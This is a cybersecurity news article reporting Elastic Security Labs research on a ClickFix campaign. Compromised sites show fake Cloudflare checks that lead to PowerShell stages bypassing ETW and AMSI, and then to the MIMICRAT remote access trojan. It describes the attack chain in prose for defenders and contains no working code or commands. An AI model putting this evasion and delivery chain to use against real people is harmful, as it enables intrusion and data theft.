ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware - The Hacker News

ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware Ravie LakshmananFeb 20, 2026Malware / Threat Intelligence Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT). "The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic," Elastic Security Labs said in a Friday report. According to the enterprise search and cybersecurity company, MIMICRAT is a custom C++ RAT with support for Windows token impersonation, SOCKS5 tunneling, and a set of 22 commands for comprehensive post-exploitation capabilities. The campaign was discovered earlier this month. It's also assessed to share tactical and infrastructural overlaps with another ClickFix campaign documented by Huntress that leads to the deployment of the Matanbuchus 3.0 loader, which then serves as a conduit for the same RAT. The end goal of the attack is suspected to be ransomware deployment or data exfiltration. In the infection sequence highlighted by Elastic, the entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript code that's responsible for loading an externally hosted PHP script. The PHP script then proceeds to deliver the ClickFix lure by displaying a fake Cloudflare verification page and instructing the victim to copy and paste a command into the Windows Run dialog to address the issue. This, in turn, leads to the execution of a PowerShell command, which then contacts a command-and-control (C2) server to fetch a second-stage PowerShell script that patches Windows event logging (ETW) and antivirus scanning (AMSI) before dropping a Lua-based loader. In the final stage, the Lua script decrypts and executes in memory shellcode that delivers MIMICRAT. The Trojan uses HTTPS for communicating with the C2 server, allowing it to accept two dozen commands for process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. "The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach," security researcher Salim Bitam said. "Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting." Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  cybersecurity, Malware, powershell, ransomware, Remote Access Trojan, Threat Intelligence, windows security Trending News 149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities ⚡ Weekly Recap: Qualcomm 0-Day, iOS Exploit Chains, AirSnitch Attack and Vibe-Coded Malware Google Confirms CVE-2026-21385 in Qualcomm Android Component Exploited Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1 Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel ThreatsDay Bulletin: DDR5 Bot Scalping, Samsung TV Tracking, Reddit Privacy Fine and More OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model APT28 Tied to CVE-2026-21513 MSHTML 0-Day Exploited Before Feb 2026 Patch Tuesday Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket Load More ▼ Popular Resources 19,053 Confirmed Breaches in 2025 – Key Trends and Predictions for 2026 Identity Controls Checklist: Find Missing Protections in Apps Self-Hosted WAF: Block SQLi, XSS, and Bots Before They Reach Your Apps Read CYBER360 2026: From Zero Trust Limits to Data-Centric Security Paths